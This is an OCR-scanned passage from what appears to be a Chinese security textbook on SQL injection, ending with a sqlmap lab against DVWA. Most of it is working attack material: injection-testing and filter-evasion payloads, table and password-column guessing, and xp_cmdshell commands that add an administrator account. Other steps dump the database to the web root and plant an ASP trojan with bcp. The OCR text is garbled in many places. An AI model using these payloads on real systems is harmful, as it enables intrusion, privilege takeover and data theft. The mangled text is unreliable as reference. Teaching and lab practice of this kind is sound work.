测试 漏洞 ,这 种 方法 是 “and 1 二 1” 和 “and 1 二 2” 的 变种 。 

比如 在 http://www. yyy. edu. cn/change. asp? id 一 ad56 这 个 网 址 后 面 加 上 ”'and '1'=='1”， 
网 址 就 变 成 了 http://www. yyy. edu. cn/change. asp? id—ad56'and '1'— 1. xl V 2831 2T 
该 网 页 ,如果 返 回 错误 的 页 面 ,那么 这 个 页 面 很 可 能 不 存在 注入 漏洞 ; 如 果 返 回 正常 的 页 
面 , 则 可 以 进一步 测试 漏洞 是 否 存在 ,将 网 址 改 为 http://www. yyy. edu. cn/change. asp? 
id 一 ad56' and '1'— '2, 如 果 返 回 错误 的 页 面 , 说 明 该 网 页 http://www. yyy. edu. cn/ 
change. asp? id 一 ad56 存在 注入 漏洞 。 

上 面 两 个 存在 注入 漏洞 的 页 面 的 区 别 如 下 。 

http://www. xxx. edu. cn/test. asp? id — 89 网 址 后 跟 的 参数 是 89, 是 数字 型 数据 ; 
http://www. yyy. edu. cn/change. asp? id 一 ad56 网 址 后 跟 的 参数 是 ad56 ,是 字符 型 数据 。 
在 数据 库 查 询 中 ,字符 型 的 值 要 用 单 引 号 括 起 来 ,而 数字 型 数据 不 用 单 引 号 括 起 来 。 

第 一 个 注入 页 面 对 应 的 SQL 查询 语句 是 : select * from 表 名 where id 一 89。 如 果 在 
网 址 后 面 加 上 了 “and 1 王 1”, 那 么 这 条 查询 语句 就 会 变 成 select * from 表 名 where id 一 89 
and 1 二 1( 可 见 , 这 里 的 变量 没有 过 滤 ) ,这 条 语句 里 ,and 是 逻辑 运算 符 ,and 前 面 的 select x 
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from 表 名 where id—89 肯定 是 对 的 ,and 后 面 的 1=1 也 是 对 的 ,根据 and 人 逻辑 运算 符 的 作 
用 ,可 以 得 出 select * from 表 名 where id—89 and 1— 1 这 条 查询 语句 也 是 对 的 ,可 以 正确 
地 从 数据 库 里 查询 出 信息 ,将 返回 正常 的 页 面 。 而 句子 select * from 表 名 where id 一 89 
and 1 一 2 肯定 不 对 了 ,这 条 查询 语句 不 能 正确 地 从 数据 库 里 查询 出 信息 ,将 返回 错误 的 
页 面 。 

第 二 个 注入 页 面 对 应 的 SQL 查询 语句 是 : select * from 3€ where id 一 'ad56'。 如 果 还 
按照 数字 型 参数 的 那 种 测试 漏洞 的 方法 ,SQL 语句 就 会 变 成 select * from 表 where id= 
'ad56 and 1 王 1' 和 select * from 表 where id— 'ad56 and 1 二 2', 因 为 程序 会 自动 查询 引号 里 
的 内 容 , 如 果 按 前 面 这 两 个 语句 提交 ,程序 查询 id 的 值 分 别 是 ad56 and 1 一 1 和 ad56 and 1 
— 2 对 应 的 记录 ,这 样 不 能 正确 地 从 数据 库 里 查询 出 信息 ,将 返回 错误 的 页 面 。 

如 果 在 http://www. yyy. edu. cn/change. asp? id 一 ad56 这 个 网 址 后 面 分 别 加 上 ”'and 
'1'='1”, SQL 查询 语句 变 成 : select * from 表 where id= 'ad56' and '1'— '1', 

如 果 在 http://www. yyy. edu. en/change. asp? id— ad56 这 个 网 址 后 面 分 别 加 上 ”'and 
一 '2”,SQL 查询 语句 变 成 : select * from 表 where id= 'ad56' and '1'— '2', 

注意 : 有 时 ASP 程序 员 会 在 程序 中 过 滤 掉 单 引号 等 字符 ,以 防止 SQL 注入 。 此 时 可 
以 用 以 下 几 种 方法 试 一 试 。 

(D 大 小 写 混 合法 。 由 于 VBS 并 不 区 分 大 小 写 , 因 此 程序 员 在 过 滤 时 通常 全 部 过 滤 大 
写字 符 串 或 者 全 部 过 滤 小 写字 符 串 ,而 大 小 写 混合 字符 串 往 往 会 被 忽视 ,如 用 SelecT 代替 
select, SELECT 等 。 

© UNICODE 法 。 在 IIS 中 ,以 UNICODE 字符 集 实现 国际 化 ,可 以 将 在 浏览 器 中 输 
入 的 字符 串 转 化 为 UNICODE 字符 串 , 如 十 转化 为 %2B、 空 格 转化 为 %20 等 。 

@ ASCII 码 法 。 可 以 把 输入 字符 串 部 分 或 全 部 用 ASCI 码 代替 ,如 A 一 chr(65) 、a 一 
chr(97) 。 

(2) 判断 数据 库 类 型 

找到 注入 点 后 , 接 下 来 就 要 判断 注入 点 连接 的 数据 库 类 型 ,下 面 介绍 几 种 判断 数据 库 类 
型 的 方法 。 

CD 在 注入 点 后 直接 加 上 单 引 号 。 在 注入 点 后 直接 加 上 单 引 号 ,然后 根据 服务 器 报错 的 
信息 来 判断 数据 库 类 型 。 

如 果 是 类 似 下 面 的 报错 信息 , 则 可 以 判断 是 Access 数据 库 。 

Microsoft JET Database Engine 错误 '80040el4' 


字符 串 的 语法 错误 在 查询 表达 式 "NewsID = 294" rfr 
/ReadNews. asp, 行 13 


如 果 是 类 似 下 面 的 报错 信息 , 则 可 以 判断 是 MS SQL Server 数据 库 。 


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040el4' 
[Microsoft][ODBC SQL Server Driver][SQL Server]?& 1 行 :附近 有 语法 错误 
/detail.asp, 行 22 
© 在 注入 点 后 加 上 *;--”( 一 个 分 号 ,两 个 连 字 符 )。 比 如 网 址 http://www. xxx. edu. cn/ 
test. asp? id 一 89 后 面 加 上 *“;--” 变 为 *http://www. xxx. edu. cn/test. asp? id 二 89;--”。 
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如 果 返 回 正 常 的 页 面 , 说 明 是 MS SQL Server 数据 库 ,因为 在 MS SQL Server 数据 库 
里 ,“; ”和 “--” 都 是 存在 的 .“; “用 来 分 离 两 个 语句 ,-- ”是 注释 符 , 在 它 后 面 的 语句 都 不 
执行 。 

如 果 返 回 错误 的 页 面 ,说 明 是 Access 数据 库 。 

O 利用 系统 表 。 如 果 用 以 上 方法 不 能 判断 数据 库 的 类 型 ,那么 可 以 利用 Access 和 MS 
SQL 数据 库 的 差异 来 进行 判断 。Access 的 系统 表 是 msysobjects, 且 在 Web 环境 下 没有 访 
问 权限 ;MS SQL 的 系统 表 是 sysobjects, 在 Web 环境 下 有 访问 权限 。 

在 注入 点 后 面 分别 加 上 ”and exists (select count( * ) from sysobjects)” 和 “and exists 
(select count( * ) from msysobjects)”。 

比如 网 址 http://www. xxx. edu. cn/test. asp? id — 89 后 面 加 上 “and exists (select 
count( * )from sysobjects) " . "E Jy http://www. xxx. edu. cn/test. asp? id — 89 and exists 
(select count( * ) from sysobjects) ,如 果 返 回 正常 的 页 面 ,说 明 是 MS SQL Server 数据 库 。 
“and exists (select count( * ) from sysobjects) ”查询 sysobjects 表 里 的 记录 数 , 如 果 返 回 正 
常 的 页 面 ,说 明 sysobjects 表 里 的 记录 数 大 于 0, 存 在 sysobjects 表 。 由 于 只 有 MS SQL 数 
据 库 里 才 有 sysobjects 表 , 因 此 可 以 判断 是 MS SQL Server 数据 库 。 

比如 网 址 http://www. xxx. edu. cn/test. asp? id 一 89 后 面 加 上 “and exists (select 
count( * )from msysobjects)”, 变 为 http://www. xxx. edu. cn/test. asp? id 一 89 and exists 
(select count( * ) from msysobjects) ,如 果 是 类 似 下 面 的 报错 信息 , 则 可 以 判断 是 Access 
数据 库 。 

注意 : 提交 这 个 语句 是 不 会 返回 正常 页 面 的 ,因为 默认 情况 下 ,是 没有 权限 查询 这 个 表 
里 的 数据 的 ,不 过 Web 会 提示 “在 'msysobjects' 上 没有 读 取 数据 权限 ”。 

Microsoft JET Database Engine 错误 '80040e09' 

不 能 读 取 记录 ; 在 'msysobjects' 上 没有 读 取 数据 权限 

/ReadNews. asp, 行 13 

注意 : 上 面 所 述 参 数 是 数字 型 时 的 检测 方法 ,如 果 参 数 是 字符 型 的 ,那么 要 在 参数 后 面 
加 上 单 引 号 ,然后 在 查询 语句 后 加 上 * ;--”。 

@ 利用 数据 库 服 务 器 的 系统 变量 。MS SQL 有 user、db_name() 等 系统 变量 ,利用 这 
些 系 统 变 量 不 仅 可 以 判断 MS SQL, 而 且 还 可 以 得 到 大 量 有 用 信息 。 

如 http://www. xxx. edu. cn/test. asp? id 一 89 and user 盖 0, 不仅 可 以 判断 是 否 是 MS 
SQL ,而 且 还 可 以 得 到 当前 连接 到 数据 库 的 用 户 名 ,如 http://www. xxx. edu. cn/test. asp? 
id 一 89 and db_name() 过 0, 不 仅 可 以 判断 是 否 是 SQL Server, 还 可 以 得 到 当前 正在 使 用 的 
数据 库 名 。 

(3) 猜测 表 名 、 字 上段 名 ( 列 名 ) ,记录 数 、 字 段 长 度 

O 猜测 表 名 。 用 到 的 语句 : and exists (select count( * ) from 要 猜测 的 表 名 )。 

比如 注入 点 http://www. xxx. edu. cn/test. asp? id — 89 后 加 上 “and exist Cselect 
count( * ) from admin)". Æ 为 http://www. xxx. edu. cn/test. asp? id — 89 and exists 
(select count( * ) from admin) 。 如 果 返 回 正常 页 面 ,说 明 存 在 表 admin; 如 果 返 回 错误 ,就 
说 明 不 存在 表 admin ,继续 猜测 其 他 表 。 
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常用 的 表 名 有 admin, adminuser, admin _ user, useruser, users, member, members, 
userlist, userinfo, memberlist, manager, systemuser, systemusers, sysuser, sys _ user, 
sysusers,sysaccounts,systemaccounts 等 。 

© 猜测 列 名 。 用 到 的 语句 : and (select count( 列 名 ) from 猜测 到 的 表 名 ?之 0。 

比如 注入 点 http://www. xxx. edu. cn/test. asp? id — 89 后 加 上 “and (select count 
(username) from admin) — 0", 7E Jg http://www. xxx. edu. cn/test. asp? id — 89 and 
(select countCusername) from admin) 70, A 5t3& [n] 1E % 9t ifii. LUI FEJ] username; 如 
果 返 回 错误 ,就 说 明 不 存在 列 username. 4E fig uU HC fi 9j 。 

常用 的 用 户 字 段 名 有 adminuser .adminname username, name, user,account 等。 

常用 的 密码 字段 名 有 password、pass、pwd、passwd、admin_password、user_passwd 等 。 

注意 : 要 确定 from 后 面 跟 的 表 名 是 存在 的 。 

© 猜测 记录 数 。 用 到 的 语句 : and (select count( * ) from 猜测 到 的 表 名 ) 二 X(X 是 个 
数字 ) 。 

比如 注入 点 http://www. xxx. edu. cn/test. asp? id — 89 后 加 上 “and (select count 
C * ) from admin) 3" ,"IEJJ http://www. xxx. edu. cn/test. asp? id 一 89 and (select count 
C* ) from admin) 二 3。 如 果 返 回 正常 页 面 , 说 明 admin 这 张 表 里 的 记录 数 大 于 3, 然 后 将 注 
入 点 变 为 http://www. xxx. edu. cn/test. asp? id 一 89 and (select count( * ) from admin) 4; 
如 果 返 回 错误 页 面 ,说 明 admin 这 张 表 里 的 记录 数 是 3, 说 明 有 3 个 管理 员 。 

CD 猜测 字段 长 度 。 用 到 的 语句 : and (select top 1 len( 列 ) from 猜测 到 的 表 名 ) 二 XCX 
是 个 数字 ) 。 

其 中 “select top 1” 是 查询 第 一 条 记录 ,在 Web 环境 下 不 支持 多 行 回 显 ,一 次 只 能 查询 
一 条 记录 ; len 是 MS SQL Server 里 的 一 个 函数 ;“() ”里 可 以 是 字符 串 、 表 达 式 或 列 名 。 

C» 猜测 用 户 名 与 密码 。 猜 用 户 名 与 密码 最 常用 也 是 最 有 效 的 方法 是 ASCH 码 逐 字 解 
码 法 ,虽然 这 种 方法 速度 较 慢 ,但 肯定 是 可 行 的 。 基 本 思路 是 先 猜 出 字段 的 长 度 , 然 后 依次 
猜 出 每 一 位 的 值 。 狂 用户 名 与 猜 密 码 的 方法 相同 ,详细 过 程 请 读者 参考 6. 1. 2 小 节 中 
的 第 6 步 。 

(4) 确定 XP CMDSHELL 可 执行 情况 

若 当 前 连接 数据 库 的 账号 具有 sa 权限 ,上 且 master. dbo. xp_cmdshell 扩展 存储 过 程 ( 调 
用 此 存储 过 程 可 以 直接 使 用 操作 系统 的 Shell) 能 够 正确 执行 , 则 可 以 通过 以 下 几 种 方法 完 
全 控制 整个 计算 机 。 

(D http://www. xxx. edu. cn/test. asp? id— YY and user 二 0。 显 示 异 常 页 面 , 但 是 可 
以 得 到 当前 连接 数据 库 的 用 户 名 ,如 果 显 示 dbo 则 表示 当前 连接 数据 库 的 用 户 是 sa。 

© http://www. xxx. edu. cn/test. asp? id 一 YY and db_name() 二 0。 显 示 异 常 页 面 ， 
但 是 可 以 得 到 当前 连接 的 数据 库 名 。 

图 http://www. xxx. edu. cn/test. asp? id 一 YY ;exec master. . xp cmdshell "net user 
name password/ add"--。 可 以 添加 操作 系统 账户 name. 86379 password. 

(D http://www. xxx. edu. cn/test. asp? id = YY; exec master.. xp _cmdshell " net 
localgroup administrators name/add"--。 把 刚 添 加 的 账户 name 加 入 administrators 组 中 。 

© http://www. xxx. edu. cn/test. asp? id 一 YY;backuup database 数据 库 名 to disk— 'c:N 
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inetpub\ wwwrootVaa. db'。 

数据 库 名 : ESSE RESI, 

把 数据 库 内 容 全 部 备份 到 Web 目录 下 ,再 用 HTTP 把 此 文件 下 载 (当然 首先 要 知道 
Web 虚拟 目录 )。 

http://www. xxx. edu. cn/test. asp? id 一 YYiexec master. dbo. xp cmdshell "copy 
c; NwinntN system32Vemd. exe c; VinetpubNscriptsVemd. exe" 。 创 建 UNICODE 漏洞 ,通过 
利用 此 漏洞 ,可 以 对 控制 整个 计算 机 (当然 首先 要 知道 Web 虚拟 目录 ) 。 

至 此 ,就 成 功 地 完成 了 一 次 SQL 注入 攻击 。 

(5) 寻找 Web 虚拟 目录 

如 果 XP CMDSHELL 不 可 以 执行 ,那么 需要 寻找 Web 虚拟 目录 。 

只 有 找到 Web 虚拟 目录 ,才能 确定 放置 ASP 木马 的 位 置 ,进而 得 到 USER 权限 。 一 般 
来 说 ,Web 虚拟 目录 是 c:\inetpub\wwwroot、d:\inetpub\wwwroot 或 d:\wwwroot 等 ,可 
执行 虚拟 目录 是 c:\inetpub\scripts、d:\inetpub\scripts 2X e: VinetpubNscripts 等 。 

如 果 Web 虚拟 目录 不 是 上 面 所 列 , 则 要 遍历 系统 的 目录 结构 ,分 析 结 果 并 发 现 Web 虚 
拟 目 录 。 有 具体 操作 步骤 如 下 。 

第 1 步 : 创建 一 个 临时 表 temp. 


www. xxx. edu. cn/test. asp? id = YY;create table temp(id nvarchar(255)，numl nvarchar(255), num2 
nvarchar(255), num3 nvarchar(255));-- 


第 2 步 : 利用 xp availablemedia 来 获得 当前 所 有 驱动 器 ,并 存 人 temp 表 中 。 
http://www. xxx. edu. cn/test.asp?id- YY; insert temp exec master. dbo. xp availablemedia;-- 

可 以 通过 查询 temp 的 内 容 来 获得 驱动 器 列表 及 相关 信息 。 

第 3 步 : 利用 xp_subdirs 获得 子 目录 列表 .并存 入 temp 表 中 。 

http://www. xxx. edu. cn/test.asp?id- YY; insert into temp(id) exec master. dbo. xp_subdirs 'c:V';-- 
第 4 步 : 利用 xp_dirtree 获得 所 有 子 目录 的 目录 树 结构 ,并存 人 temp 表 中 。 

xxx. edu. cn/test. asp?id = YY; insert into temp(id, numl) exec master. dbo. xp_dirtree 
这 样 就 可 以 成 功 地 浏览 到 所 有 的 目录 (文件 夹 ) 列 表 。 

注意 : 以 上 每 完成 一 项 浏览 ,应 删除 temp 表 中 的 所 有 内 容 , 删 除 方法 如 下 。 


http://www. xxx. edu. cn/test. asp?id = YY;delete from temp;-- 


(0 上 传 ASP 木马 

所 谓 ASP 木马 ,就 是 一 段 有 特殊 功能 的 ASP 代码 ,被 放 入 可 执行 虚拟 目录 下 ,远程 客 
户 就 可 以 通过 浏览 器 执行 它 , 进 而 得 到 系统 的 USER 权限 ,实现 对 系统 的 初步 控制 。 

两 种 比较 有 效 的 上 传 ASP 木马 的 方法 如 下 。 

方法 一 : 利用 Web 的 远程 管理 功能 。 

许多 Web 站 点 为 了 维护 方便 ,都 提供 了 远程 管理 的 功能 , 即 存 在 这 样 的 一 个 网 页 ,要 求 
输入 用 户 名 与 密码 ,只 有 输入 正确 的 用 户 名 与 密码 , 才 可 以 进行 下 一 步 的 操作 ,实现 对 Web 
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的 管理 ,如 上 传 、 下 载 文 件 、 目 录 浏 览 等 。 因 此 ,如果 能 够 得 到 正确 的 用 户 名 与 密码 ,不 仅 可 
以 上 传 ASP 木马 ,甚至 能 够 直接 得 到 USER 权限 而 控制 整个 系统 “寻找 Web 虚拟 目录 ”的 
复杂 操作 也 可 以 省 略 。 

用 户 名 及 密码 一 般 存放 在 一 张 表 中 ,发 现 这 张 表 并 读 取 其 中 内 容 便 解 决 了 问题 。 以 下 
给 出 两 种 有 效 方法 。 

(OD 注入 法 (针对 登录 页 面 的 注入 )。SQL 注入 式 攻 击 就 是 把 SQL 命令 插入 Web 表单 
的 输入 域 或 页 面 请 求 的 查询 字符 串 中 ,欺骗 服务 器 执行 恶意 的 SQL 命令 。 

如 图 6-23 所 示 ,登录 页 面 中 会 有 形 如 “select * from admin where username— 'XXX' 
and password — 'YY Y ”的 语句 ,车 在 正式 运行 此 语句 之 前 没有 进行 必要 的 字符 过 滤 , 则 很 
容易 实施 SQL 注入 。 

针对 登录 页 面 ( 如 图 6-23 所 示 ) 的 注入 如 下 。 

在 用 户 名 字 和 密码 输入 框 中 输入 “'or '1' 二 '1”。 单 击 “ 登 录 ” 按 钮 后 ,将 输入 的 内 容 提 交 
给 服务 器 ,服务 器 运行 SQL 命令 : select * from admin where name= '' or '1'— '1' AND 


password-— ''or '1'—'1', 
由 于 现在 多 数 网 站 登录 页 面 的 源 代 码 很 少 有 这 方面 的 漏洞 ,因此 这 种 方法 成 功率 不 高 。 
^ 
后 台 管 理 系统 
管理 账 叶 : erui 
EEL: | 
验证 码 : 3278 3278 E 


图 6-23 登录 页 面 


© 猜测 法 。 基 本 思路 是 : 猜测 数据 库 名 称 ,猜测 数据 库 中 的 存放 用 户 名 与 密码 的 表 
名 ,猜测 表 中 的 每 个 字段 名 ,然后 猜测 表 中 的 每 条 记录 内 容 。 详 细 猜 测 过 程 请 读者 参 
考 6.1.1 小 节 和 6.1.2 小节。 

方法 二 : 利用 将 表 导 成 文件 的 功能 。 

SQL Server 中 的 bep 命令 可 以 把 表 的 内 容 导 成 文本 文件 并 放 到 指定 位 置 。 

先 建 一 张 临时 表 temp ,在 表 中 一 行 一 行 地 输入 一 个 ASP 木马 ,然后 用 bep 命令 导出 
ASP 文件 。 命 令 行 格式 如 下 : 


bcp "select * from temp" queryout c:\inetpub\wwwroot\ma. asp -c -S localhost -U sa - P asdf 


其 中 s 参数 为 执行 查询 的 服务 器 ,U 参数 为 用 户 名 ,P 参数 为 密码 ,最 终 上 传 了 一 个 
ma. asp 的 木马 。 

(7) 获得 系统 管理 员 权限 

ASP 木马 只 有 USER 权限 ,要 想 完全 控制 系统 ,还 要 有 系统 管理 员 的 权限 。 提 升 权 限 
的 方法 有 : 复制 cmd. exe 到 可 执行 虚拟 目录 (一 般 为 scripts 目录 ) 下 ,人 为 制造 UNICODE 
漏洞 ; 下 载 SAM 文件 ,破解 并 获取 操作 系统 中 的 所 有 用 户 名 和 密码 。 
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4. 针对 MS SQL Server 的 常见 SQL 注入 方法 
COD. 取得 当前 连接 数据 库 用 户 


http: 
http: 


如 图 


// ww. xxx. edu. cn/test. asp?id- (select user name()) — 
/ / www. xxx. edu. cn/test. asp?id- 389 and user name()» 0 


6-24 所 示 , 从 错误 信息 中 得 到 当前 数据 库 用 户 为 cw88163。 


e- 


D- @ O Q LO omea | E) Qia: 


Micros: 
Micro: 


/detai: 


oft OLE DB Provider for ODBC Drivers 18i& '80040e07" 


soft] [ODBC SQL Server Driver] [SQL Server] 将 nvarchar fli 'cw88163' 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 错误 。 


mum mi. 


l.asp ff 22 


6-24 select user_name() 


C2) 取得 当前 连接 数据 库 名 


http://www. xxx. edu. cn/test. asp?id- (select db name()) -一 
http://www. xxx. edu. cn/test. asp? id- 389 and db name()» 0 


如 图 


dS OA EE o I i) 加 于 va 


6-25 所 示 , 从 错误 信息 中 得 到 当前 数据 库 名 为 cw88163_db。 


/detail. 


Microsoft OLE DB Provider for ODBC Drivers 错误 "80040e07 


Dticrosoft][ODBC SQL Server Driver] [SQL Server] nvarchar ff 'cw88163 db' 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 错误 。 


„asp ff 22 


Fd 6-25 select db nameO 


(3) 备份 数据 库 


http://www. xxx. edu. cn/test. asp? id = 1; backup database cw88163 db to disk = 'c:\ inetpub\ 
wwwrootMl.db'; —— 


将 数据 库 备 份 到 Web 目录 下 ,然后 就 可 以 通过 HTTP 将 整个 数据 库 下 载 。 
(4) 新 建 用 户 


http://www. xxx. edu. cn/test. asp?id = 1;exec master..xp cmdshell "net user name password /add" —— 


分 号 “ 
句 在 SQL 


i" fe SQL Server 中 表示 隔 开 前 后 两 句 语句 ,“--” 表 示 后 面 的 语句 为 注释 。 该 语 
Server 中 被 分 为 两 句 执行 ,先是 “select * from table where id 二 1”, 然 后 执行 存 


储 过 程 xp_cmdshell, 这 个 存储 过 程 用 于 调用 系统 命令 “net user name password /add”, 用 


net 命令 新 


建 了 用 户 名 为 name、 密 码 为 password 的 Windows 账号 。 


(5) 加 入 管理 员 组 


http : 


//www. xxx. edu. cn/test. asp? id = 1; exec master.. xp  cmdshell " net localgroup 


administrators name /add" —— 


Je a 


注意 : 
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的 账号 name 加 入 管理 员 组 。 
该 方法 只 适用 于 用 sa 连接 数据 库 的 情况 。 
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6.1.4 实例 : 使 用 SQLmap 进行 SQL 注入 
实验 环境 如 图 6-26 所 示 。 


€; —9 : Windows 7 
攻击 者 : Kali Linux 2.0 安装 WAMP 和 DVWA 


IP; 192.168.201.133 IP: 10.108.162.164 


6-26 ”实验 环境 


为 方便 读者 实验 ,建议 在 Windows 7 中 安装 VMware, 然 后 创建 虚拟 机 ,在 虚拟 机 中 安 
装 Kali Linux 2.0。 

本 次 实验 的 目的 : 使 用 SQLmap 得 到 : DHA MySQL 用 户 名 与 密码 ; 思 枚 举 所 有 数 
据 库 ; 加 枚 举 指定 数据 库 的 数据 表 ; @ 枚 举 指 定 表 中 的 所 有 用 户 名 与 密码 。 

注意 : 本 书 配套 资源 中 包含 wampserver2. 5-Apache-2. 4. 9-Mysql-5. 6. 17-php5. 5. 12- 
32b. exe, 读 者 可 以 从 http://www. wampserver. com/en/ 下 载 最 新 版 。 

本 书 配 套 资源 中 包含 DVWA-1. 0. 8.zip。DVWA(Dam Vulnerable Web Application? 
是 用 PHP-- MySQL 编写 的 一 套用 于 常规 Web 漏洞 教学 和 检测 的 Web 脆弱 性 测试 程序 ， 
包含 了 SQL 注入 、XSS、 盲 注 等 常见 的 一 些 安全 漏洞 。 

第 1 步 : 安装 wampserver, 安 装 位 置 为 D:\wamp\。 

第 2 步 : 安装 DVWA ,安装 位 置 为 D:\wamp\www\DVWA-1.0. 8\。 

将 DVWA-1.0.8\config\config. inc. php 文件 中 $_DVWAL'db_password 中 一 'p@ 
sswOrd' 修 改 为 $_DVWAL[L'db_password 沾 一 '123456 '。 

打开 mysql 命令 行 ,执行 如 下 两 条 命令 ,设置 root 密码 为 123456 。 

mysql > use mysql 

mysql > update user set password = password('123456') where User = 'root'; 

第 3 步 : 获得 当前 会 话 Cookie 等 信息 。 使 用 SQLmap 之 前 .需要 获得 当前 会 话 Cookie 
等 信息 ,用 来 在 渗透 过 程 中 维持 连接 状态 ,在 Iceweasel 浏览 器 中 依次 选择 Tools Add-ons 
命令 ,在 搜索 栏 里 输入 Tamper Data, 从 搜索 结果 中 选择 Tamper Data 并 安装 即 可 。 

在 Iceweasel 浏览 器 地 址 栏 中 输入 : http://10. 108. 162. 164/DVWA-1. 0. 8/ 。 
Username 为 admin, Password 为 password. 

然后 ,依次 选择 Tools? Tamper Data 命令 ,如 图 6-27 所 示 。 

得 到 当前 的 Cookie 为 “security 王 low; PHPSESSID 二 to857ug0p8ksrbroupl6ss6hk7”。 

第 4 步 : 设置 DVWA 安全 等 级 。 为 方便 实验 ,将 DVWA 安全 等 级 设置 为 low， 
如 图 6-28 所 示 。 

第 5 步 : 获得 目标 页 面 。 接 下 来 进入 页 面 的 SQL Injection 部 分 ,输入 任意 值 (asd) 并 
提交 ,如 图 6-29 所 示 。 

可 以 看 到 get 请 求 的 ID 参数 (在 浏览 器 地 址 栏 ) 如 下 : 


http://10. 108. 162. 164/DVWA-1. 0. 8/vulnerabilities/sqli/?id= 1&Submit = Submit # 
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Dv Google aj 


t 


Home 


PHPSESSID to857ugOp8ksrbroupl6ss6hk7 


10.108.162.164 
User-Agent Mozilla/5.0 (X11; 
Accept text/html, applicati 
Accept-Language  en-US,en;q=0.5 
Accept-Encoding gzip, deflate 
Referer http://10.108.16; 


6-27 ”获得 当前 会 话 Cookie 等 信息 


DVWA Security 9 


Script Security 
Security Level is currently low. 

You can set the security level to low, medium or high. 
The security level changes the vulnerability level of DVWA. 


mx - [Simi] 


PHPIDS 

PHPIDS v0.6 (PHP-Intrusion Detection System) is a security layer for PHP based web applications. 
You can enable PHPIDS across this site for the duration of your session. 

PHPIDS is currently disabled. [enable PHPIDS] 

[Simulate attack] - [View IDS log] 


DVWA Security 


| Security level set to low ] 


6-28 设置 DVWA 安全 等 级 


该 页 面 就 是 我 们 的 目标 页 面 。 
第 6 步 : 检索 当前 数据 库 和 当前 用 户 。 执 行 如 下 命令 检索 当前 数据 库 和 当前 用 户 , 结 
果 如 图 6-30 所 示 。 
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(€ & 10.108.162.164/DVWA-1.0.8/vulnerabilities/squ/?id- asd& Submit- Submit v e][C v Googie 


È Most Visited v Billorrensive Security Kali Linux ‘Ñ Kali Docs Kali Tools BExploit-DB MAircrack-ng 


4[|rime [Memory [Function [Location 
1| 0.0000 | _142328|{mainK) | ndexphp:0 
2| 0.0150 | 237560require onceCDiwampWwwwIDYWA-LOSVunerabliiesisqiiSOUcEUOWPhD ) | ndexphp:30 


x EY 
wn) 


Vulnerability: SQL Injection 
User ID: 
asd Submit 

More info 


http 
http 
Mp. 
http 


sqinjection-cheatsheet 


图 6-29 获得 目标 页 面 


root@kali: ~ eoo0 
文件 (F) 编辑 (E) 查看 (V) 搜索 (5) 终端 (T) 帮助 (H) 


[23:02:32] [INFO] the back-end DBMS is MySQl 
[23:02:32] [INFO] fetching banner 

web server operating system: Windows 

web application technology: Apache 2.4.9, PHP 5.5.12 
back-end DBMS: MySQL 5.0 


banner: '5,6.17 

[23:02:32] [INFO] fetching current user 
current user: ' root@ocalhost' 

[23:02:32] [INFO] fetching current database 
current database: ' dvwa' 


[23:02:32] [INFO] fetched data logged to text files under '/root/. sqlmap/ output/ 10. 108. 162. 164" 


[*] shutting down at 23:02:32 


rootékali: ~# 


图 6-30 检索 当前 数据 库 和 当前 用 户 


sqlmap - u "http://10. 108. 162. 164/DVWA — 1. 0. 8/vulnerabilities/sqli/?id = 1&Submit = Submit" 
—- cookie = "security = low; PHPSESSID = to857ug0p8ksrbroupl6ss6hk7" -b -- current- db -- 
current - user 

选项 说 明 如 下 。 

-u: 指定 目标 URL。 

--cookie: 设置 Cookie 值 。 

-b: 获取 DBMS banner。 

--current-db; 获取 当前 数据 库 。 

--current-user; 获取 当前 用 户 。 

另外 ,执行 less /root/. sqlmap/output/10. 108. 162. 164/log 命令 可 以 得 到 上 面 信息 。 
第 7 步 : 枚 举 所 有 的 DBMS 用 户 和 密码 。 执 行 如 下 命令 枚 举 所 有 的 DBMS 用 户 和 密 
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码 ,结果 如 图 6-31 所 示 。 


sqlmap — u "http://10.108.162.164/DVWA - 1. 0. 8/vulnerabilities/sqli/? id = 1&Submit = Submit" 
—- cookie = "security = low; PHPSESSID = to857ug0p8ksrbroupl6ss6hk7" —- string = "Surname" 一 一 


users —— password 

选项 说 明 如 下 。 

--string: 用 来 匹配 页 面 中 的 字符 串 。 
--users; 枚 举 DBMS 用 户 。 

--password: 枚 举 DBMS 用 户 密码 hash. 


xmn 编辑 (E) asuv mS), HAC) 帮助 (H) 


e for eventual further processing with other tools [y/N] y 
945516/ sql K6IhU. txt 


5: 18] [ INFC 


[23:05:19] [INFO hed data logged to t ft d ot/. squmap/ output/ 10. 108. 162. 164 


[*] shutting down at 23:05:19 


rootékali: -# 


图 6-31 DBMS 用 户 和 密码 


第 8 步 : 枚 举 DBMS 中 的 数据 库 。 执 行 如 下 命令 枚 举 DBMS 中 的 数据 库 , 结 果 
如 图 6-32 所 示 。 


sqlmap - u "http://10.108.162.164/DVWA - 1. 0. 8/vulnerabilities/sqli/?id = l&Submit = Submit" 
—- cookie = "security = low; PHPSESSID = to857ug0p8ksrbroupl6ss6hk7" -- dbs 

选项 说 明 如 下 。 

--dbs: 枚 举 DBMS 中 的 数据 库 。 


root@kali: ~ eoo0 
文件 (F) 编辑 (E) 查看 (V) 搜索 (5) 终端 (D 帮助 (H) 


web server operating system: Windows 
Meb application technology: Apache 2.4.9, PHP 5.5.12 
back- end DBMS: MySQL 5.0 
[23:07:31] [INFO] fetching dat 
available databases [5]: 


[*] dvwa 
[*] information schema 

[*] mysql 

[*] performance schema 

[*] test 

[23:07:31] [INFO] fetched data logged to text files under '/root/. sqlmap/ output/ 10. 108. 162. 164 
[*] shutting down at 23:07:31 

root&kali:-4 | 


图 6-32 枚 举 DBMS 中 的 数据 库 
第 9 步 : 枚 举 指定 数据 库 中 的 表 。 执 行 如 下 命令 枚 举 指定 数据 库 (DVWA) 中 的 表 , 结 
果 如 图 6-33 所 示 。 
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sqlmap — u "http://10.108.162.164/DVWA - 1. 0. 8/vulnerabilities/sqli/? id = 1&Submit = Submit" 
—- cookie = "security = low; PHPSESSID = to857ug0p8ksrbroup16ss6hk7” -D dvwa —- tables 


选项 说 明 如 下 。 
-D: 指定 数据 库 。 
--tables: 枚 举 数据 库 中 的 表 。 


web server operating system: Windows 
Web application technology: Apache 2.4.9, PHP 5.5.12 
back-end DBMS: MySQL 5.0 

[23:08:59] [INFO] fetching tables for database: 'dvwa' 
Database: dvwa 

[2 tables] 

e 


| guestbook | 

users l 
[23:08:59] [INFO] fetched data logged to text files under '/root/.sqlmap/ output/ 10. 108. 162. 164' 
[*] shutting down at 23:08:59 


rootékali: ~# 
